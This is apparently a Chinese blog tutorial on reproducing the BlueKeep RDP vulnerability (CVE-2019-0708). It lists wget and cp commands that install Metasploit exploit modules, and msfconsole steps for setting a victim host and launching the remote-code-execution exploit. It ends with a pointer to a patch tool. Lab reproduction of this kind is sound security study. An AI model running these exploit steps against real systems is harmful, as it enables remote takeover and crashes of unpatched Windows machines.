CVE-2019-0708

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

 

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

影响范围

 

  • Windows 7
  • Windows Server 2008 R2
  • Windows Server 2008
  • Windows 2003
  • Windows XP

首先更新我们的kaili

apt-get  install metasploit-framework

更新完成后

打开msfconsole 并未有利用程序只有检测工具

CVE 2019-0708漏洞复现防御修复 Safe 第1张

 

下载 exp

网盘:链接: https://pan.baidu.com/s/11He0JOhvKfWPaXCcclmKtQ 提取码: vh8h 

wget 下载
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

 

把下载的文件

依次执行命令创建利用文件夹

mkdir -p /usr/share/metasploit-framework/modules/exploit/windows/rdp/
mkdir  -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mkdir  -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp rdp.rb   /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cp cve_2019_0708_bluekeep.rb  /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp cve_2019_0708_bluekeep_rce.rb   /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

 

重新打开msfconsole

重新加载

reload_all

CVE 2019-0708漏洞复现防御修复 Safe 第2张

 

 我们导入

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

CVE 2019-0708漏洞复现防御修复 Safe 第3张

 

 这个exp 目前只有 windwos 7  /2008r2  而且是社区阉割版容易蓝屏

set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用exploit开始攻击,等待建立连接

CVE 2019-0708漏洞复现防御修复 Safe 第4张

 

 当然也可以选其他的

show targets

直接run 

CVE 2019-0708漏洞复现防御修复 Safe 第5张

 

 之前复现过一次在复现就一执行就蓝屏 放一张朋友成功的

CVE 2019-0708漏洞复现防御修复 Safe 第6张

 

 而我的

CVE 2019-0708漏洞复现防御修复 Safe 第7张

 

 

漏洞修复

http://weishi.360.cn/mianyigongju.html

前往这个地址进行漏洞修复

CVE 2019-0708漏洞复现防御修复 Safe 第8张

 

 

 CVE 2019-0708漏洞复现防御修复 Safe 第9张

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄